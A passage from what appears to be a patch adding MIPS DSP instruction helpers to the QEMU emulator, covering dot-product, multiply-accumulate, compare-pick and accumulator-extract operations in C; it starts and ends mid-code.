set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempC & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (tempC & MIPSDSP_LLO); \ +} + +DP_128OPERATION_PH(dpaqx_sa_w_ph, 1); +DP_128OPERATION_PH(dpsqx_sa_w_ph, 0); + +#undef DP_128OPERATION_HP + +#if defined(TARGET_MIPS64) +#define DP_QH(name, is_add, use_ac_env) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs3, rs2, rs1, rs0; \ + int32_t rt3, rt2, rt1, rt0; \ + int32_t tempD, tempC, tempB, tempA; \ + int64_t acc[2]; \ + int64_t temp[2]; \ + int64_t temp_sum; \ + \ + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + if (use_ac_env) { \ + tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); \ + tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); \ + tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); \ + } else { \ + tempD = mipsdsp_mul_u16_u16(rs3, rt3); \ + tempC = mipsdsp_mul_u16_u16(rs2, rt2); \ + tempB = mipsdsp_mul_u16_u16(rs1, rt1); \ + tempA = mipsdsp_mul_u16_u16(rs0, rt0); \ + } \ + \ + temp[0] = (int64_t)tempD + (int64_t)tempC + \ + (int64_t)tempB + (int64_t)tempA; \ + \ + if (temp[0] >= 0) { \ + temp[1] = 0; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[1] = env->active_tc.HI[ac]; \ + acc[0] = env->active_tc.LO[ac]; \ + \ + if (is_add) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] = acc[1] + 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] = acc[1] - 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DP_QH(dpa_w_qh, 1, 0); 
+DP_QH(dpaq_s_w_qh, 1, 1); +DP_QH(dps_w_qh, 0, 0); +DP_QH(dpsq_s_w_qh, 0, 1); + +#undef DP_QH + +#endif + +#define DP_L_W(name, is_add) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int32_t temp63; \ + int64_t dotp, acc; \ + uint64_t temp; \ + bool overflow; \ + \ + dotp = mipsdsp_mul_q31_q31(ac, rs, rt, env); \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + if (is_add) { \ + temp = acc + dotp; \ + overflow = MIPSDSP_OVERFLOW_ADD((uint64_t)acc, (uint64_t)dotp, \ + temp, (0x01ull << 63)); \ + } else { \ + temp = acc - dotp; \ + overflow = MIPSDSP_OVERFLOW_SUB((uint64_t)acc, (uint64_t)dotp, \ + temp, (0x01ull << 63)); \ + } \ + \ + if (overflow) { \ + temp63 = (temp >> 63) & 0x01; \ + if (temp63 == 1) { \ + temp = (0x01ull << 63) - 1; \ + } else { \ + temp = 0x01ull << 63; \ + } \ + \ + set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((temp & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (temp & MIPSDSP_LLO); \ +} + +DP_L_W(dpaq_sa_l_w, 1); +DP_L_W(dpsq_sa_l_w, 0); + +#undef DP_L_W + +#if defined(TARGET_MIPS64) +#define DP_L_PW(name, func) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs1, rs0; \ + int32_t rt1, rt0; \ + int64_t tempB[2], tempA[2]; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); \ + tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); \ + \ + if (tempB[0] >= 0) { \ + tempB[1] = 0x00; \ + } else { \ + tempB[1] = ~0ull; \ + } \ + \ + if (tempA[0] >= 0) { \ + tempA[1] = 0x00; \ + } else { \ + tempA[1] = ~0ull; \ + } \ + \ + temp_sum = tempB[0] + tempA[0]; \ + if (((uint64_t)temp_sum < 
(uint64_t)tempB[0]) && \ + ((uint64_t)temp_sum < (uint64_t)tempA[0])) { \ + temp[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] += tempB[1] + tempA[1]; \ + \ + mipsdsp_##func(acc, ac, temp, env); \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +DP_L_PW(dpaq_sa_l_pw, sat64_acc_add_q63); +DP_L_PW(dpsq_sa_l_pw, sat64_acc_sub_q63); + +#undef DP_L_PW + +void helper_mulsaq_s_l_pw(target_ulong rs, target_ulong rt, uint32_t ac, + CPUMIPSState *env) +{ + int32_t rs1, rs0; + int32_t rt1, rt0; + int64_t tempB[2], tempA[2]; + int64_t temp[2]; + int64_t acc[2]; + int64_t temp_sum; + + rs1 = (rs >> 32) & MIPSDSP_LLO; + rs0 = rs & MIPSDSP_LLO; + rt1 = (rt >> 32) & MIPSDSP_LLO; + rt0 = rt & MIPSDSP_LLO; + + tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); + tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); + + if (tempB[0] >= 0) { + tempB[1] = 0x00; + } else { + tempB[1] = ~0ull; + } + + if (tempA[0] >= 0) { + tempA[1] = 0x00; + } else { + tempA[1] = ~0ull; + } + + acc[0] = env->active_tc.LO[ac]; + acc[1] = env->active_tc.HI[ac]; + + temp_sum = tempB[0] - tempA[0]; + if ((uint64_t)temp_sum > (uint64_t)tempB[0]) { + tempB[1] -= 1; + } + temp[0] = temp_sum; + temp[1] = tempB[1] - tempA[1]; + + if ((temp[1] & 0x01) == 0) { + temp[1] = 0x00; + } else { + temp[1] = ~0ull; + } + + temp_sum = acc[0] + temp[0]; + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && + ((uint64_t)temp_sum < (uint64_t)temp[0])) { + acc[1] += 1; + } + acc[0] = temp_sum; + acc[1] += temp[1]; + + env->active_tc.HI[ac] = acc[1]; + env->active_tc.LO[ac] = acc[0]; +} +#endif + +#define MAQ_S_W(name, mov) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t tempA; \ + int64_t tempL, acc; \ + \ + rsh = (rs >> mov) & MIPSDSP_LO; \ + rth = (rt >> mov) & MIPSDSP_LO; \ + tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & 
MIPSDSP_LLO); \ + tempL = (int64_t)tempA + acc; \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempL & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (tempL & MIPSDSP_LLO); \ +} + +MAQ_S_W(maq_s_w_phl, 16); +MAQ_S_W(maq_s_w_phr, 0); + +#undef MAQ_S_W + +#define MAQ_SA_W(name, mov) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t tempA; \ + \ + rsh = (rs >> mov) & MIPSDSP_LO; \ + rth = (rt >> mov) & MIPSDSP_LO; \ + tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + tempA = mipsdsp_sat32_acc_q31(ac, tempA, env); \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t)(((int64_t)tempA & \ + MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)((int64_t)tempA & \ + MIPSDSP_LLO); \ +} + +MAQ_SA_W(maq_sa_w_phl, 16); +MAQ_SA_W(maq_sa_w_phr, 0); + +#undef MAQ_SA_W + +#define MULQ_W(name, addvar) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int32_t rs_t, rt_t; \ + int32_t tempI; \ + int64_t tempL; \ + \ + rs_t = rs & MIPSDSP_LLO; \ + rt_t = rt & MIPSDSP_LLO; \ + \ + if ((rs_t == 0x80000000) && (rt_t == 0x80000000)) { \ + tempL = 0x7FFFFFFF00000000ull; \ + set_DSPControl_overflow_flag(1, 21, env); \ + } else { \ + tempL = ((int64_t)rs_t * (int64_t)rt_t) << 1; \ + tempL += addvar; \ + } \ + tempI = (tempL & MIPSDSP_LHI) >> 32; \ + \ + return (target_long)(int32_t)tempI; \ +} + +MULQ_W(mulq_s_w, 0); +MULQ_W(mulq_rs_w, 0x80000000ull); + +#undef MULQ_W + +#if defined(TARGET_MIPS64) + +#define MAQ_S_W_QH(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int16_t rs_t, rt_t; \ + int32_t temp_mul; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LO; \ + rt_t = (rt >> mov) & MIPSDSP_LO; \ + temp_mul = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ + \ + 
temp[0] = (int64_t)temp_mul; \ + if (temp[0] >= 0) { \ + temp[1] = 0x00; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = env->active_tc.HI[ac]; \ + \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + acc[0] = temp_sum; \ + acc[1] += temp[1]; \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_S_W_QH(maq_s_w_qhll, 48); +MAQ_S_W_QH(maq_s_w_qhlr, 32); +MAQ_S_W_QH(maq_s_w_qhrl, 16); +MAQ_S_W_QH(maq_s_w_qhrr, 0); + +#undef MAQ_S_W_QH + +#define MAQ_SA_W(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int16_t rs_t, rt_t; \ + int32_t temp; \ + int64_t acc[2]; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LO; \ + rt_t = (rt >> mov) & MIPSDSP_LO; \ + temp = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ + temp = mipsdsp_sat32_acc_q31(ac, temp, env); \ + \ + acc[0] = (int64_t)(int32_t)temp; \ + if (acc[0] >= 0) { \ + acc[1] = 0x00; \ + } else { \ + acc[1] = ~0ull; \ + } \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_SA_W(maq_sa_w_qhll, 48); +MAQ_SA_W(maq_sa_w_qhlr, 32); +MAQ_SA_W(maq_sa_w_qhrl, 16); +MAQ_SA_W(maq_sa_w_qhrr, 0); + +#undef MAQ_SA_W + +#define MAQ_S_L_PW(name, mov) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs_t, rt_t; \ + int64_t temp[2]; \ + int64_t acc[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rs_t = (rs >> mov) & MIPSDSP_LLO; \ + rt_t = (rt >> mov) & MIPSDSP_LLO; \ + \ + temp[0] = mipsdsp_mul_q31_q31(ac, rs_t, rt_t, env); \ + if (temp[0] >= 0) { \ + temp[1] = 0x00; \ + } else { \ + temp[1] = ~0ull; \ + } \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = env->active_tc.HI[ac]; \ + \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + 
((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + acc[0] = temp_sum; \ + acc[1] += temp[1]; \ + \ + env->active_tc.HI[ac] = acc[1]; \ + env->active_tc.LO[ac] = acc[0]; \ +} + +MAQ_S_L_PW(maq_s_l_pwl, 32); +MAQ_S_L_PW(maq_s_l_pwr, 0); + +#undef MAQ_S_L_PW + +#define DM_OPERATE(name, func, is_add, sigext) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + int32_t rs1, rs0; \ + int32_t rt1, rt0; \ + int64_t tempBL[2], tempAL[2]; \ + int64_t acc[2]; \ + int64_t temp[2]; \ + int64_t temp_sum; \ + \ + temp[0] = 0x00; \ + temp[1] = 0x00; \ + \ + MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + if (sigext) { \ + tempBL[0] = (int64_t)mipsdsp_##func(rs1, rt1); \ + tempAL[0] = (int64_t)mipsdsp_##func(rs0, rt0); \ + \ + if (tempBL[0] >= 0) { \ + tempBL[1] = 0x0; \ + } else { \ + tempBL[1] = ~0ull; \ + } \ + \ + if (tempAL[0] >= 0) { \ + tempAL[1] = 0x0; \ + } else { \ + tempAL[1] = ~0ull; \ + } \ + } else { \ + tempBL[0] = mipsdsp_##func(rs1, rt1); \ + tempAL[0] = mipsdsp_##func(rs0, rt0); \ + tempBL[1] = 0; \ + tempAL[1] = 0; \ + } \ + \ + acc[1] = env->active_tc.HI[ac]; \ + acc[0] = env->active_tc.LO[ac]; \ + \ + temp_sum = tempBL[0] + tempAL[0]; \ + if (((uint64_t)temp_sum < (uint64_t)tempBL[0]) && \ + ((uint64_t)temp_sum < (uint64_t)tempAL[0])) { \ + temp[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] += tempBL[1] + tempAL[1]; \ + \ + if (is_add) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] -= 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DM_OPERATE(dmadd, mul_i32_i32, 1, 1); 
+DM_OPERATE(dmaddu, mul_u32_u32, 1, 0); +DM_OPERATE(dmsub, mul_i32_i32, 0, 1); +DM_OPERATE(dmsubu, mul_u32_u32, 0, 0); +#undef DM_OPERATE +#endif + +/** DSP Bit/Manipulation Sub-class insns **/ +target_ulong helper_bitrev(target_ulong rt) +{ + int32_t temp; + uint32_t rd; + int i; + + temp = rt & MIPSDSP_LO; + rd = 0; + for (i = 0; i < 16; i++) { + rd = (rd << 1) | (temp & 1); + temp = temp >> 1; + } + + return (target_ulong)rd; +} + +#define BIT_INSV(name, posfilter, ret_type) \ +target_ulong helper_##name(CPUMIPSState *env, target_ulong rs, \ + target_ulong rt) \ +{ \ + uint32_t pos, size, msb, lsb; \ + uint32_t const sizefilter = 0x3F; \ + target_ulong temp; \ + target_ulong dspc; \ + \ + dspc = env->active_tc.DSPControl; \ + \ + pos = dspc & posfilter; \ + size = (dspc >> 7) & sizefilter; \ + \ + msb = pos + size - 1; \ + lsb = pos; \ + \ + if (lsb > msb || (msb > TARGET_LONG_BITS)) { \ + return rt; \ + } \ + \ + temp = deposit64(rt, pos, size, rs); \ + \ + return (target_long)(ret_type)temp; \ +} + +BIT_INSV(insv, 0x1F, int32_t); +#ifdef TARGET_MIPS64 +BIT_INSV(dinsv, 0x7F, target_long); +#endif + +#undef BIT_INSV + + +/** DSP Compare-Pick Sub-class insns **/ +#define CMP_HAS_RET(name, func, split_num, filter, bit_size) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt) \ +{ \ + uint32_t rs_t, rt_t; \ + uint8_t cc; \ + uint32_t temp = 0; \ + int i; \ + \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + cc = mipsdsp_##func(rs_t, rt_t); \ + temp |= cc << i; \ + } \ + \ + return (target_ulong)temp; \ +} + +CMP_HAS_RET(cmpgu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); + +#ifdef TARGET_MIPS64 +CMP_HAS_RET(cmpgu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); +CMP_HAS_RET(cmpgu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); +#endif + +#undef 
CMP_HAS_RET + + +#define CMP_NO_RET(name, func, split_num, filter, bit_size) \ +void helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int##bit_size##_t rs_t, rt_t; \ + int##bit_size##_t flag = 0; \ + int##bit_size##_t cc; \ + int i; \ + \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + \ + cc = mipsdsp_##func((int32_t)rs_t, (int32_t)rt_t); \ + flag |= cc << i; \ + } \ + \ + set_DSPControl_24(flag, split_num, env); \ +} + +CMP_NO_RET(cmpu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); + +CMP_NO_RET(cmp_eq_ph, cmp_eq, 2, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_lt_ph, cmp_lt, 2, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_le_ph, cmp_le, 2, MIPSDSP_LO, 16); + +#ifdef TARGET_MIPS64 +CMP_NO_RET(cmpu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); +CMP_NO_RET(cmpu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); + +CMP_NO_RET(cmp_eq_qh, cmp_eq, 4, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_lt_qh, cmp_lt, 4, MIPSDSP_LO, 16); +CMP_NO_RET(cmp_le_qh, cmp_le, 4, MIPSDSP_LO, 16); + +CMP_NO_RET(cmp_eq_pw, cmp_eq, 2, MIPSDSP_LLO, 32); +CMP_NO_RET(cmp_lt_pw, cmp_lt, 2, MIPSDSP_LLO, 32); +CMP_NO_RET(cmp_le_pw, cmp_le, 2, MIPSDSP_LLO, 32); +#endif +#undef CMP_NO_RET + +#if defined(TARGET_MIPS64) + +#define CMPGDU_OB(name) \ +target_ulong helper_cmpgdu_##name##_ob(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int i; \ + uint8_t rs_t, rt_t; \ + uint32_t cond; \ + \ + cond = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rs_t = (rs >> (8 * i)) & MIPSDSP_Q0; \ + rt_t = (rt >> (8 * i)) & MIPSDSP_Q0; \ + \ + if (mipsdsp_cmpu_##name(rs_t, rt_t)) { \ + cond |= 0x01 << i; \ + } \ + } \ + \ + set_DSPControl_24(cond, 8, env); \ + \ + return (uint64_t)cond; \ +} + +CMPGDU_OB(eq) +CMPGDU_OB(lt) +CMPGDU_OB(le) +#undef CMPGDU_OB +#endif + +#define PICK_INSN(name, split_num, filter, 
bit_size, ret32bit) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint32_t rs_t, rt_t; \ + uint32_t cc; \ + target_ulong dsp; \ + int i; \ + target_ulong result = 0; \ + \ + dsp = env->active_tc.DSPControl; \ + for (i = 0; i < split_num; i++) { \ + rs_t = (rs >> (bit_size * i)) & filter; \ + rt_t = (rt >> (bit_size * i)) & filter; \ + cc = (dsp >> (24 + i)) & 0x01; \ + cc = cc == 1 ? rs_t : rt_t; \ + \ + result |= (target_ulong)cc << (bit_size * i); \ + } \ + \ + if (ret32bit) { \ + result = (target_long)(int32_t)(result & MIPSDSP_LLO); \ + } \ + \ + return result; \ +} + +PICK_INSN(pick_qb, 4, MIPSDSP_Q0, 8, 1); +PICK_INSN(pick_ph, 2, MIPSDSP_LO, 16, 1); + +#ifdef TARGET_MIPS64 +PICK_INSN(pick_ob, 8, MIPSDSP_Q0, 8, 0); +PICK_INSN(pick_qh, 4, MIPSDSP_LO, 16, 0); +PICK_INSN(pick_pw, 2, MIPSDSP_LLO, 32, 0); +#endif +#undef PICK_INSN + +target_ulong helper_packrl_ph(target_ulong rs, target_ulong rt) +{ + uint32_t rsl, rth; + + rsl = rs & MIPSDSP_LO; + rth = (rt & MIPSDSP_HI) >> 16; + + return (target_long)(int32_t)((rsl << 16) | rth); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_packrl_pw(target_ulong rs, target_ulong rt) +{ + uint32_t rs0, rt1; + + rs0 = rs & MIPSDSP_LLO; + rt1 = (rt >> 32) & MIPSDSP_LLO; + + return ((uint64_t)rs0 << 32) | (uint64_t)rt1; +} +#endif + +/** DSP Accumulator and DSPControl Access Sub-class insns **/ +target_ulong helper_extr_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int32_t tempI; + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + tempI = (tempDL[0] >> 1) & MIPSDSP_LLO; + + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 
1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)tempI; +} + +target_ulong helper_extr_r_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)(int32_t)(tempDL[0] >> 1); +} + +target_ulong helper_extr_rs_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int32_t tempI, temp64; + int64_t tempDL[2]; + + shift = shift & 0x1F; + + mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); + if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + set_DSPControl_overflow_flag(1, 23, env); + } + tempDL[0] += 1; + if (tempDL[0] == 0) { + tempDL[1] += 1; + } + tempI = tempDL[0] >> 1; + + if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && + ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { + temp64 = tempDL[1] & 0x01; + if (temp64 == 0) { + tempI = 0x7FFFFFFF; + } else { + tempI = 0x80000000; + } + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)tempI; +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dextr_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + + shift = shift & 0x3F; + + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_r_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) 
+{ + uint64_t temp[3]; + uint32_t temp128; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_rs_w(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + if (temp128 == 0) { + temp[0] = 0x0FFFFFFFF; + } else { + temp[0] = 0x0100000000ULL; + } + set_DSPControl_overflow_flag(1, 23, env); + } + + return (int64_t)(int32_t)(temp[0] >> 1); +} + +target_ulong helper_dextr_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + target_ulong result; + + shift = shift & 0x3F; + + mipsdsp_rndrashift_acc(temp, ac, shift, env); + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} + +target_ulong helper_dextr_r_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + uint32_t temp128; + target_ulong result; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + set_DSPControl_overflow_flag(1, 23, env); + } + + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} + +target_ulong helper_dextr_rs_l(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + uint64_t temp[3]; + 
uint32_t temp128; + target_ulong result; + + shift = shift & 0x3F; + mipsdsp_rndrashift_acc(temp, ac, shift, env); + + temp[0] += 1; + if (temp[0] == 0) { + temp[1] += 1; + if (temp[1] == 0) { + temp[2] += 1; + } + } + + temp128 = temp[2] & 0x01; + + if ((temp128 != 0 || temp[1] != 0) && + (temp128 != 1 || temp[1] != ~0ull)) { + if (temp128 == 0) { + temp[1] &= ~0x00ull - 1; + temp[0] |= ~0x00ull - 1; + } else { + temp[1] |= 0x01; + temp[0] &= 0x01; + } + set_DSPControl_overflow_flag(1, 23, env); + } + result = (temp[1] << 63) | (temp[0] >> 1); + + return result; +} +#endif + +target_ulong helper_extr_s_h(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t temp, acc; + + shift = shift & 0x1F; + + acc = ((int64_t)env->active_tc.HI[ac] << 32) | + ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); + + temp = acc >> shift; + + if (temp > (int64_t)0x7FFF) { + temp = 0x00007FFF; + set_DSPControl_overflow_flag(1, 23, env); + } else if (temp < (int64_t)0xFFFFFFFFFFFF8000ULL) { + temp = 0xFFFF8000; + set_DSPControl_overflow_flag(1, 23, env); + } + + return (target_long)(int32_t)(temp & 0xFFFFFFFF); +} + + +#if defined(TARGET_MIPS64) +target_ulong helper_dextr_s_h(target_ulong ac, target_ulong shift, + CPUMIPSState *env) +{ + int64_t temp[2]; + uint32_t temp127; + + shift = shift & 0x1F; + + mipsdsp_rashift_acc((uint64_t *)temp, ac, shift, env); + + temp127 = (temp[1] >> 63) & 0x01; + + if ((temp127 == 0) && (temp[1] > 0 || temp[0] > 